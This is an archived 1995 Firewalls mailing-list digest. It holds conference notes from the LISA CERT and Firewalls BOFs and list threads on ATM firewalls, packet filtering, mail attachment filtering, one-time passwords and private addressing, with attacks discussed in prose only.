From firewalls-owner Sun Oct 1 00:30:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09703 for firewalls-outgoing; Sun, 1 Oct 1995 00:24:36 -0700 Received: from huntergate.hunter.com (node2.hunter.com [199.217.148.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA17493 for ; Fri, 29 Sep 1995 00:31:24 -0700 Received: (from daemon@localhost) by huntergate.hunter.com (8.6.11/8.6.9) id CAA19886; Fri, 29 Sep 1995 02:29:49 -0500 Received: from diablo.hunter.com(10.2.1.50) by huntergate.hunter.com via smap (V1.3) id sma019876; Fri Sep 29 02:29:45 1995 Received: from Microsoft Mail (PU Serial #0) by diablo.hunter.com (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Sep29.022645.0.1569; Fri, 29 Sep 1995 02:29:46 -0500 From: rik@spirit.com (rikspirit.com) To: skh@huntergate.hunter.com, Firewalls@greatcircle.com (Firewalls) Message-ID: <1995Sep29.022645.0.1569@diablo.hunter.com> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Hunter Engineering Company Date: Fri, 29 Sep 1995 02:29:46 -0500 Subject: CERT and Firewalls BOFs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here are my notes from the Usenix LISA XI conference in Monterrey, CA. I try to identify speakers, but still missed some, and there are parts missing (I tend to stop taking notes if things get so interesting I forget what I'm supposed to be doing.} Comments which I added later are in square brackets. CERT BOF, 1830, 21 September, 1995 Ed DeHart of CERT started the CERT BOF by joking that the annual Sendmail-LISA CERT Alert had come out [a problem with SunOS sendmail when used with the -oR option]. Someone pointed out that last year it wasn't exactly sendmail, but rather Majordomo's use of sendmail that prompted the alert. DeHart mentioned the latest release of sendmail, 8.7, which prompted yet-another comment--a person claimed that Marcus Ranum had a two line Perl script which would overflow a gets()-style buffer in the latest release. Ranum came in a few minutes later, but did not comment on this assertion in front of the group. Syslog is considered by the CERT to be the other current problem. [It is actually not the syslog daemon that's the problem, but the subroutine which gets called by applications to communicate with syslog.] DeHart next stated that CERT is primarily interested in infrastructure problems, for example, people breaking into ISP's [Internet Service Providers]. He hinted that CERT's role would be changing from incident response to incident collection, infrastructure improvements, and working with vendors to fix problems. Which prompted a question about vendors, why they still delivered insecure versions of their operating systems. DeHart answered that customers must demand securely configured operating systems before vendors will be willing to deliver them. He mentioned a paper delivered the day before, by a security administrator from Sun, who said that SunSoft was not currently planning to improve the security of their delivered products because surveys of customers indicated that security was not an important consideration when buying OS products. [I'd asked the same question several years ago and got the same answer--when customers demand security, Sun will deliver it.] DeHart pointed out that vendors whose name appear most regularly in CERT advisories are cooperating with CERT. A prominent UNIX vendor which has no CERT advisories simply means the vendor is not cooperating with CERT. The tool apparently used during the Tsutomo Shimomura breakin is being widely distributed. The tool takes advantage of 'r' commands (rlogin, rsh), even if protected by tcp_wrappers or netacl, by using IP source address spoofing. The interface makes this cracking tool easy-to-use, asking for the name of host to breakinto, and the name of the trusted host to masquerade as. DeHart repeated something he has said many times before--do the simple things, and the crackers will go elsewhere. "Why spend 10 minutes when they can take 30 seconds to get in?" [Perhaps this seems a little unfair, but only about 70% of large, commercial sites have any type of firewall (CSI report). And people are always adding new systems to the network without checking them first for security.] The Berkeley 'r' commands, NFS, are not secure. Question: What about Macs, NT, Windows 95? DeHart answered that we may start seeing things, but so far they are mostly clients. Client software is not susceptible to direct attacks. Question: Will you report things like Word Virus? DeHart said not currently. Can't deal with every PC bug. There are about 12,000 addresses on the CERT mailing list for advisories, and 50 parallel queues are used to deliver alerts (which takes one-two hours). The CERT tools mailing list has been inactive for months, and may not be re-opened. ==== Firewalls BOF, 1833, 21 Sept, 1995 Brent Chapman takes over, starting off with the brief history of the BOF (started at the Third Usenix Security Symposium in Baltimore three years ago). Currently 8,000 subscribers to firewalls, with perhaps 15,000 readers. Carson Gaspar, of Lehman Brothers, next got things off to a lively start. [Gaspar is a frequent poster to the fwtk-users mailing list.] Carson asked the audience [about 110 persons] if he should rewrite the ftp-gw proxy, part of the Firewall Toolkit, to do passive ftp? Or should he work with Brimstone SOS [which also has a license similar to TIS for their proxies, but fewer services], because the code quality is better. Securitywise, fwtk is good. But return codes are never checked--when a proxy fails, it fails silently. [For some reason, he doesn't know who wrote this "poor quality code".] Marcus Ranum, steps forward, and says he wrote most of the code [his name appears in most proxies except http-gw]. There is no explosion, just tension and anticipation in the air. Carson then does an informal survey. How many have commercial firewalls, how many have 'home-grown' firewalls, how many have no firewall? About as many have commercial products (~15) as have no firewall. More than three times as many have 'home-grown' firewalls. [In CSI's survey, 12% used TIS fwtk, and 16% stated other, which probably includes a lot of SOCKS users, because SOCKS wasn't listed as a category. So a Usenix LISA BOF was unsurprisingly different than the CSI survey, which included large, not predominatly UNIX, sites, and showed about 60-70% commercial firewall products.] Brent Chapman commented on the licensing problem involved in publicky available software, such as Majordomo, or the Firewall toolkit. Marcus Ranum stated that one major concern was divergent versions. There were no security problems with the toolkit per se, but there were known problems--many of which were dealt with in Gauntlet 3.0. [No one mentioned that the issue of how to proceed with extending the toolkit, or supporting it, was thoroughly hashed out during the Usenix Security Symposium at Salt Lake City. Chapman does comment:] "I for one do not want to go down that road again." Gaspar hasn't given up yet, and wants to distribute code. Ranum comes back again by saying the unreleased code base has diverged enormously, so hard to know if what you are fixing has already been fixed. [Question: Has anyone used plug-gw to push notes through a firewall?] Alan Hannon, of Midnet, said he had done so, and plug-gw works fine for anything that is many-to-one. I asked Chapman about the syslog problem. He responded that the problem is NOT in the sylog daemon, but in the function call library itself. CSRG [Computer Science Research Group at Berkely, which I thought had disbanded] threatened to go through all the [UNIX] code and remove all unbounded string copies [the problem], but gave up. [snprintf the solution, pointed out a particpant in the front row.] Ranum steps onto the soapbox and states the "C is not a secure language, and UNIX is not a secure operating system. We're in the sendmail bug-of- the-month club because of this." Software engineers need to grow up. Hannon quips that this is like the hazardous waste industry--we're stuck with what we have. Ranum retorts that the user community is still buying toxic waste as fast as it can. Someone else asks, what about using ADA on NT? Ranum apparently ignores this, saying that for some applications, UNIX and C are not sufficient. Another person I labeled said that he recommended a client buy Gauntlet. The client did, then insisted that they permit IRC through the firewall. TIS disagreed, the consultant disgreed, but IRC was rammed through anyway. Hannon asked what do people do about modems? Someone, a defense contractor, said they had to fire someone to make people take notice of the no modem policy. Carson said Lehman implemented a dial-out modem pool, which is audited. Hannon said he worked hard so users would not WANT a modem. Carson stated that they dial all lines, using numbers acquired from facilities management, looking for modems. Two persons were 'let go'. Another got a slap on the wrist for a 'technical violation'. Chapman said that policy is a management issue [his new book has a great chapter on policy, BTW]. Ranum responded by saying you need to get a letter from the biggest, hottest person saying why the policy is important, and then get approval from the highest ranking management (president, vice-president) possible. Sal Collora asked what is the real threat posed by modems? Who is going to sit around dialing phone numbers looking for modems? Hannon answers that he hasn't met enough dweebs. [I think, hasn't he heard of demon dialers, invented for the Apple II in the late '70's?] Ranum answered that he'd seen two firewall hosts broken into, both because modem-based attacks had been used to sniff passwords. He also said he has seen networks where the firewall host was the ONLY secure computer. Chapman also answered the question by saying that not publishing modem numbers was security through obscurity. Assume the problem is an insider or an ex-employee. Collora said he'd only been at this job two months, and didn't want to beat his head against the wall. John [jco@direwolf.com] recommended doing a cost analysis. No sense building a fort protecting a dandylion. Chapman pointed out that just the cost of restoring the data would justify a firewall in most cases [one of my favorite points]. Secrecy, data integrity, and availability are reasons for security. Why do you keep the data if you don't need it?. John said he is worried about demon dialing. And that his site was fifth to be attached to the ARPANET, and they argued long and hard about putting in packet filters, not even a firewall [the company which owned that site now sells firewalls]. Ranum asked why they decided to add protection, to which John didn't respond. Another survey. How many here have done some form of risk assessment? Around 20%. Have a site security policy? 20% Have that policy signed and approved by corporate officer? Only two hands go up. Chapman points out that every site has a security policy, even if it's not written. Ranum then makes certain people are still awake. He mentions that in five years, lawyers will be able to sue for recovery of damages for a breakin. When there is a body-of-law available, they can slap suits without any effort. Likened this to soft body tissue damage. [Another of my favorite points. You have a network which is unprotected. Someone uses your network to breakinto another network, so the attack comes from your site. Who gets sued? Who has deep pockets?] Another unidentified particpant said that it is hard to keep people from screwing up machines. Chapman said you've got to do auditing. Carson, responding to a question I didn't note, said security is an iterative problem. Pick the two biggest problems and fix them. Then go on, pick the next two top things, and fix those, and so on. He sleeps soundly at night because he has three layers of protection [in Lehman's firewall?]. Ranum asks "Does Lehman have Flowtrans?" What scares Ranum is that the Internet is often behind the firewall. Private connections, connections to other organizations which are connected to the Internet. The Plan 9 guys, the Athena guys, have it right. Put security at the presentation device. John pointed out that Ranum was saying six or seven years until firewalls won't be needed, and now [several years later], he is saying three or four years. Ranum answered by saying that security has got to be everywhere. Someone wants fascinating thing X. Rather than simply providing it, need to make a service oriented requirements analysis to see if they really need X, and how to get data to X. Real purpose of a firewall is to provide service. The six main services are Mail, Web, FTP, Telnet, News, and DNS. Another speaker said you can't control clients, to which Ranum responded "The only way to solve bad management is to become it." John pointed out that human engineering was the method used in the movie Hackers, the movie, to get the modem pool number. NEARNet has had to deal with this. Their NOC [Network Operations Center] is one of the largest in the world. They went ahead and did a cost analysis which included the possibility that someone would set off a car bomb outside. They concluded it wasn't worth building a bunker in the middle of Cambridge. Collora said he's interested in moving to NT. Chapman said that you should always pick the platform you are most familiar with. There are more tools on UNIX than anything else. But if you don't have UNIX expertise, you're in a tough position. Collora said that he would be happy to buy something, then have a vendor to point a finger at. John asked if he'd ever read a software license agreement, where the only warranty is on the media used for distribution of the software. And, amazingly enough, the meeting broke up in time for the reception in the Monterrey Aquarium at 2000. Rik Farrow rik@spirit.com ------ Message Header Follows ------ Received: from lapis.hunter.com by diablo.hunter.com (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Sep29.014802.0.749; Fri, 29 Sep 1995 01:48:02 -0500 Received: from huntergate.hunter.com by lapis.hunter.com with SMTP (1.38.193.4/16.2) id AA02149; Fri, 29 Sep 95 01:45:37 -0500 Received: (from daemon@localhost) by huntergate.hunter.com (8.6.11/8.6.9) id BAA19095; Fri, 29 Sep 1995 01:47:59 -0500 Received: from uustar.starnet.net(199.217.253.12) by huntergate.hunter.com via smap (V1.3) id sma019093; Fri Sep 29 01:47:35 1995 Received: from scsgate.scscom.com by uustar.starnet.net with UUCP id AA11822 (5.67b/IDA-1.5); Fri, 29 Sep 1995 01:21:49 -0500 Received: by scsgate.stl.scscom.com (Smail3.1.29.1 #4) id m0syXqM-0002Isa; Fri, 29 Sep 95 00:18 CDT Sender: kenth@HNS.St-Louis.Mo.US Received: (from kenth@localhost) by gwydion.HNS.St-Louis.Mo.US (8.6.12/8.6.12) id AAA07444; Fri, 29 Sep 1995 00:15:36 -0500 Received: from scsgate.scscom.com (uucp@localhost) by gwydion.HNS.St-Louis.Mo.US (8.6.12/8.6.12) with UUCP id FAA07968 for Kent.Hamilton; Thu, 28 Sep 1995 05:02:59 -0500 Received: by scsgate.stl.scscom.com (Smail3.1.29.1 #4) id m0syEzl-00039ma; Thu, 28 Sep 95 04:11 CDT Sender: kenth@HNS.St-Louis.Mo.US Received: from relay4.UU.NET by uustar.starnet.net with SMTP id AA09816 (5.67b/IDA-1.5 for ); Thu, 28 Sep 1995 03:42:51 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjcs02577; Thu, 28 Sep 1995 04:34:55 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA04090 for firewalls-outgoing; Thu, 28 Sep 1995 00:18:07 -0700 Received: from apache.spirit.com (cust010.nb1p1.ffx1.va.ALTERDIAL.ALTER.NET [199.173.113.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA27364 for ; Tue, 26 Sep 1995 18:05:47 -0700 Reply-To: rik@spirit.com Received: from localhost (rik@localhost) by apache.spirit.com (8.6.5/8.6.5) id RAA01228 for Firewalls@greatcircle.com; Tue, 26 Sep 1995 17:45:12 -0700 Date: Tue, 26 Sep 1995 17:45:12 -0700 From: Rik Farrow Message-Id: <199509270045.RAA01228@apache.spirit.com> To: Firewalls@greatcircle.com Subject: CERT and Firewalls BOFs Sender: kenth@HNS.St-Louis.Mo.US Precedence: bulk From firewalls-owner Sun Oct 1 12:22:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA00145 for firewalls-outgoing; Sun, 1 Oct 1995 12:18:58 -0700 Received: from satsong.interserver.com (ckapilla.interserver.com [204.182.67.73]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA00138 for ; Sun, 1 Oct 1995 12:18:55 -0700 Message-Id: <199510011918.MAA00138@miles.greatcircle.com> Received: from SATSONG by satsong.interserver.com id aa000379 at Sun, 1 Oct 95 12:16:01 Pacific Daylight Time--100 X-Sender: ckapilla@interserver.com X-Mailer: Windows Eudora Version 2.1.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 01 Oct 1995 12:16:00 -0700 To: firewalls@GreatCircle.COM From: Chris Kapilla Subject: Mail Loops X-Info: InterServe Web Systems, Inc. X-Mailedby: NT SMTP/LISTSERVER v2.10 (ntmail@net-shopper.co.uk) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings all, This isn't really relevant to firewalls, but it *is* relevant to this list because it seems to happen here regularly, i.e., those lovely mail storms. My questions are: what causes these and what can I (and everyone else) do to make sure that *our* systems are never responsible for one of them. Thanks for any help. Cooly, Chris ------------------------------------------------------------------- ckapilla@interserver.com http://www.interserver.com 206.836.3661 206.836.9468 From firewalls-owner Sun Oct 1 15:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02377 for firewalls-outgoing; Sun, 1 Oct 1995 15:21:48 -0700 Received: from hughes.network.com (hughes.network.com [129.191.63.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA02370 for ; Sun, 1 Oct 1995 15:21:43 -0700 Received: from [129.191.40.14] by hughes.network.com via SMTP (940816.SGI.8.6.9/940406.SGI) id RAA24859; Sun, 1 Oct 1995 17:19:15 -0500 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 1 Oct 1995 18:23:45 -0500 To: firewalls@greatcircle.com, thierry@namsa.nato.int From: hughes@hughes.network.com (James P. Hughes) Subject: The ATM Firewall, research project. (was Re: Frame Relay firewalls???) Cc: Ken Hardy , Ted Doty Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I believe that the initial quote is not talking about the switches >themselves, but just to the IP traffic which comes via ATM; the >company, which obviously has a product to sell and may be skewing >reality a bit, seems to claim that ordinary IP firewalls need the whole >IP packet, requiring reassembly. Reality is in the eye of the beholder, but let me respond with a few comments. I am the principal investigator on this project and am responsible for the claims and backing those claims up with existance proofs. Ken is correct in what he is saying. We will have a product that we want to sell in the future when it is complete. At this time, it is not ready for -prime time-. At this time, it is a research project trying to understand how to completely firewall (using the most encompassing definition of the word) a 150Mb/s ATM stream. >ATM packets are small and fixed sized -- 5 bytes header and 48 bytes >payload. Don't recall details of what I read about IP over ATM (a >recent Computer Communications Review had an issue devoted to ATM -- >v25n2 04/95), but I assume that the IP packets are spread among several >ATM packets, rather than using IP fragmentation and having an entire IP >packet, albeit a fragment, in each tiny ATM packet. (Corrections >welcome.) Your summary is indeed 100% correct. An IP packet is a sequence of cells. The first cell usually contains all of the IP header (IP options move things around) and the TCP and UDP headers can be in the 1st or later cell. The user data (obviously) is after that. The cells in the stream can be mixed with other cells of other virtual circuits. >It appears that this outfit has some sort of IP firewall (maybe just a >screen) for ATM that works without reassembling the IP packets, >achieving lower latency. At the lowest level, you are correct, but in the press release, there is not a lot of space to get in the detailed facts... This is a better forum for such a discussion. Packets, where the policy can be digested to a low number of fields (VC number, SNAP, IP Frag, IP source and destination, IP Proto, Ports and flags) without need to be changed, will indeed be screened. What is not mentioned, is that packets that can not be secured through screening, will be reassembled and fed into a more traditional firewall host (which is currently a Sun clone running SunOS, but the packets do not go through the SunOS networking stacks). Reassembly can be at the packet level or all the way to the TCP stream, there are only performance issues to work on. This is based on the idea that high performance connections (when authenticated) such as a FTP data transfer can, for the period of the transfer, be screened. (To my knowledge, this is similarly done by at least one combination of a Firewall and a brand C router...) It is also expected that the high performance stuff will releave the CPU load for the lower proformance traffic (such as telnet, ftp control connection, etc). It is expected that a 1-3ms increae in latency for reassembled telnet sessions will not be a significant loss of performance to those sessions. >It would be interesting to know what they have and what real extra >value it offers. Low latency and high performance streams. The latency of the screened traffic will be 15us +- 1us. There are several other ATM specific security measures such as filtering the ATM call setup mesages and management cells. >I posted the original press release. After having >done so, I repented somewhat and thought that perhaps I should just >have posted their URL for those really interested. I am sorry to say that this is not in our web pages yet.... >But if it initiates >a discussion here that helps increase general knowledge of these issues >(like whether or not they're significant), without too much noise, it >may be for the best. I think that this discussion is for the better. Thanks. I welcome well though out discussions of these kinds of technical issues. Please keep me in the reply streas, because I do not follow this mailing list. This is just a fragment of the details of the implementation, I will be happy to continue this discussion. jim -------------- HTTP://WWW.Network.com/~hughes From firewalls-owner Sun Oct 1 16:52:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA03254 for firewalls-outgoing; Sun, 1 Oct 1995 16:28:56 -0700 Received: from rex.isdn.net (rex.isdn.net [198.79.88.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA03247 for ; Sun, 1 Oct 1995 16:28:53 -0700 Received: from ppp201.ts2.isdn.net by rex.isdn.net with smtp (Smail3.1.29.1 #10) id m0szXnH-00093FC; Sun, 1 Oct 95 18:27 CDT Message-Id: Date: Sun, 1 Oct 95 18:27 CDT X-Sender: jbucy@rex.isdn.net (Unverified) X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: jbucy@rex.isdn.net (John Bucy) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Sun Oct 1 22:52:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA06263 for firewalls-outgoing; Sun, 1 Oct 1995 20:31:01 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA06256 for ; Sun, 1 Oct 1995 20:30:56 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id LAA08766 for GreatCircle.COM!Firewalls; Thu, 28 Sep 1995 11:22:41 -0500 Received: by ris1.nmti.com (smail2.5) id AA13594; 28 Sep 95 10:15:22 CDT (Thu) Received: by sonic.nmti.com; id AA04617; Thu, 28 Sep 1995 10:42:17 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509281542.AA04617@sonic.nmti.com.nmti.com> Subject: Re: CERT and Firewalls BOFs To: rik@spirit.com Date: Thu, 28 Sep 1995 10:42:17 -0500 (CDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <199509270045.RAA01228@apache.spirit.com> from "Rik Farrow" at Sep 26, 95 05:45:12 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1351 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Which prompted a question about vendors, why they still delivered > insecure versions of their operating systems. > [I'd asked > the same question several years ago and got the same answer--when > customers demand security, Sun will deliver it.] Sounds like a case could be made for contributory negligence on Sun's part, given how long they've known of the problem... > Carson asked the audience [about 110 persons] if he should rewrite the > ftp-gw proxy, part of the Firewall Toolkit, to do passive ftp? Or > should he work with Brimstone SOS [which also has a license similar to > TIS for their proxies, but fewer services], because the code quality is > better. Why can't he just use whichever proxies he wants. They won't wake up and go "Ick, Freestone, I'm outta here!"... > [Question: Has anyone used plug-gw to push notes through a firewall?] I've used plug-gw to run WinDD through a firewall. Does that count? > Someone else asks, what about using ADA on NT? [insert reference to C.A.R.Hoare's Turing Award Lecture] I've been playing around on NT. I don't have a compiler or debugger, but you have to assume just about any GPF in a service is a potential trouble spot. I've gotten GPFs in services. Remember, NT is written in assembly and C++. Do any of your daemons core dump? Have you fixed or replaced them? Why not? From firewalls-owner Mon Oct 2 02:00:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA11950 for firewalls-outgoing; Mon, 2 Oct 1995 01:56:36 -0700 Received: from mimos.my (mimos.my [192.228.128.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA11943 for ; Mon, 2 Oct 1995 01:56:30 -0700 Received: from ms.mimos.my (ms.mimos.my [192.228.129.33]) by mimos.my (8.6.12/8.6.12) with SMTP id QAA03026 for ; Mon, 2 Oct 1995 16:54:57 +0800 Received: by ms.mimos.my (5.64/7.0) id AA04020; Mon, 2 Oct 95 16:54:56 +0800 Date: Mon, 2 Oct 1995 16:54:55 +0800 From: Musaddik Mokhtar To: firewalls@greatcircle.com Subject: OPIE 2.03 with FWTK's auth Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, Has anybody used OPIE as a one time password mechanism with FWTK's auth? I wonder if this could be done since it is very similar to S/KEY which FWTK supports. If it has been done by anybody out there, I could use and would appreciate some pointers (no point taking time reinventing the wheel). For those who are looking for S/KEY to fix on BSDI boxes (but to no avail), I suggest you take a look at OPIE. It works like a charm on BSDI. Regards. - Musaddik _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ _/ _/ _/ _/ Musaddik Mokhtar _/ dique@ms.mimos.my _/ _/ System Support Group _/ http://www.bsk.mimos.my/~dique _/ _/ Division of Computer Systems @ MIMOS _/ _/ _/ Malaysia _/ _/ _/ _/ _/ _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ From firewalls-owner Mon Oct 2 02:52:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA13075 for firewalls-outgoing; Mon, 2 Oct 1995 02:43:11 -0700 Received: from hk.super.net (hk.super.net [202.14.67.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA13054 for ; Mon, 2 Oct 1995 02:42:49 -0700 Received: from rssd.hk.olivetti.com (rssd.hk.olivetti.com [202.64.192.5]) by hk.super.net (8.7/8.7) with SMTP id RAA18734 for <@hk.super.net:firewalls@greatcircle.com>; Mon, 2 Oct 1995 17:40:50 +0800 (HKT) Message-Id: <199510020940.RAA18734@hk.super.net> Subject: Re: Choice of secure router software To: lyndond@sentinet.demon.co.uk (Lyndon David) Date: Mon, 2 Oct 1995 17:30:22 +0800 (HKT) From: "Raju M. Daryanani" Cc: firewalls@greatcircle.com In-Reply-To: <199509271534.QAA07205@server.sentinet.demon.co.uk> from "Lyndon David" at Sep 27, 95 04:32:55 pm X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Lyndon David: > At the moment I am looking at the routers and have set up a > machine running screend which works just fine, my question > though is this. The filter rules in screend only work on > forwarded packets, it is unable to operate on any packets > destined for any of the machines interfaces. Obviously this I am setting up a single machine to act as both a router and a firewall. I'm using FreeBSD and originally planned on using screend to do all the packet filtering, until I ran into this "forwarded packets only" limitation. I've now switched to ip_fil, which can be found on coombs.anu.edu.au. It also allows greater control in specifying IP flags and options than screend or the ipfilter that ships with FreeBSD. One big difference between screend and ip_fil is that screend does a bit of caching to decide whether a IP fragment should be forwarded or not. ip_fil doesn't, but it does allow you to block fragments that might overwrite the headers in the original packet. That prevents the attack whereby someone sends in a packet with a valid header then overwrites the header options with a following fragment. I think ipfirewall only works on SGI machines, so I didn't look into it. > Would anyone be interested in a free router software resource > section in the FAQ, with enough replies we (I) could prepare > a section if it was thought to be of enough interest and the > maintainer is willing. I proposed this to someone else who sent me a few suggestions on using FreeBSD as a firewall. At the time I was suggesting a FreeBSD specific writeup, complete with installation tips, but I think a more generic writeup would be just as useful. Raju -- Raju M. Daryanani | Email: raju@rssd.hk.olivetti.com Technical Support Manager | raju@hk.super.net, raju@air.org Products Division | Tel: +852 2979 2450 / Fax: +852 2802 6650 Olivetti (HK) Ltd. | [Finger for PGP key] [MIME understood] From firewalls-owner Mon Oct 2 03:22:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA13862 for firewalls-outgoing; Mon, 2 Oct 1995 03:11:57 -0700 Received: from caesar.udac.se (caesar.udac.se [193.44.79.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA13855 for ; Mon, 2 Oct 1995 03:11:53 -0700 Received: by caesar.udac.se id AA22982 (5.67b-Emil1.1/IDA-1.5 for Firewalls@GreatCircle.COM); Mon, 2 Oct 1995 11:08:22 +0100 Date: Mon, 2 Oct 1995 11:08:21 +0100 (MEZ) From: Mats Bredell Subject: Re: Mail Proxy To: Chris Tyler Cc: Firewalls@GreatCircle.COM In-Reply-To: <306bfa630.8f9@devel.dejong.com> Message-Id: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 29 Sep 1995, Chris Tyler wrote: > Thinking about this, the main possibilities are: > > uuencode > binhex > MIME > > and a whack of proprietary formats. Each of these has a recognizable header or > some other string signature, regardless of where (body or attachment) the data > appears. Couldn't a nice fat regexp be written that would detect these strings? And, > although there are a whack of proprietary formats, if you targetted the ones that > your site would likely be able to decode (don't worry about, say, > WANG-2200-MAILABLE-BINARY or IBM-EBCDIC-AUTOMACRO-ENCRYPTED if > you're only running on PCs and Suns :-), you should be able to stop 99%+ of the > binaries-within-mail, no? (And most macros, etc., will be binary, although not object > code). Have a look at Emil, a package that converts different mail formats. Emil can be used as a filter, discovers the attachment formats and converts them into the format you want. This won't solve your particular problem, but a filter that converts all incoming mail into uuencode should make it a lot simpler. Emil can be found at /Mats From firewalls-owner Mon Oct 2 04:22:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA15815 for firewalls-outgoing; Mon, 2 Oct 1995 04:12:32 -0700 Received: from office.un.kiev.ua (office.un.kiev.ua [194.44.28.227]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA15771 for ; Mon, 2 Oct 1995 04:12:02 -0700 Received: (from scorp@localhost) by office.un.kiev.ua (8.6.12/0409) id OAA08316; Mon, 2 Oct 1995 14:08:02 +0200 Date: Mon, 2 Oct 1995 14:08:02 +0200 (EET) From: Slava Kritov X-Sender: scorp@office.un.kiev.ua To: Chris Tyler cc: Firewalls@GreatCircle.COM Subject: Re: Mail Proxy In-Reply-To: <306c46060.cfb@devel.dejong.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! > > based on name ... > > Right... so? The purpose was to deny all attachments, whether word DOCs or executables. So > you look for the uuencode signature string and deny. Users *will* complain ... Maybe smth like PDF ( acrobat ) will solve the problem ? Best Slava From firewalls-owner Mon Oct 2 04:30:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA16017 for firewalls-outgoing; Mon, 2 Oct 1995 04:28:05 -0700 Received: from office.un.kiev.ua (office.un.kiev.ua [194.44.28.227]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA16010 for ; Mon, 2 Oct 1995 04:27:44 -0700 Received: (from scorp@localhost) by office.un.kiev.ua (8.6.12/0409) id OAA08457; Mon, 2 Oct 1995 14:22:54 +0200 Date: Mon, 2 Oct 1995 14:22:53 +0200 (EET) From: Slava Kritov X-Sender: scorp@office.un.kiev.ua To: Christopher Osborn cc: firewalls@greatcircle.com Subject: Re: Running ftpd on another port In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! > have the logdaemon ftpd run on another port. It can run on any port(high > ports are fine!). I can't find a compile switch or parameter on the > daemon(clients of course are no problem.) Look in inetd.conf. Duplicate the record with ftpd, and put another port number. Best Slava From firewalls-owner Mon Oct 2 05:53:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17896 for firewalls-outgoing; Mon, 2 Oct 1995 05:31:19 -0700 Received: from E-MAIL.COM (e-mail.com [199.171.26.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA17889 for ; Mon, 2 Oct 1995 05:31:15 -0700 Message-Id: <199510021231.FAA17889@miles.greatcircle.com> Received: from cem-bb.e-mail.com by E-MAIL.COM (IBM VM SMTP V2R2) with BSMTP id 8496; Mon, 02 Oct 95 08:29:12 EDT Date: Mon, 02 Oct 1995 08:33:01 EDT From: toon@cem-bb.e-mail.com To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: RFC 1597 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I really like the idea of what is proposed in RFC1597, this is (I think) AT PRESENT (before the general implementation of IPv6, who knows when) THE SOLUTION for small companies with a potential need for a lot of IP-adresses (printers, LAN-print boxes, ... ). To connect such a network to the Internet, I understand that one needs the proper kind of firewall (dual-homed gateway, nice name). To make this work perfect one would like to have the possibilty to reserve a small part of the official 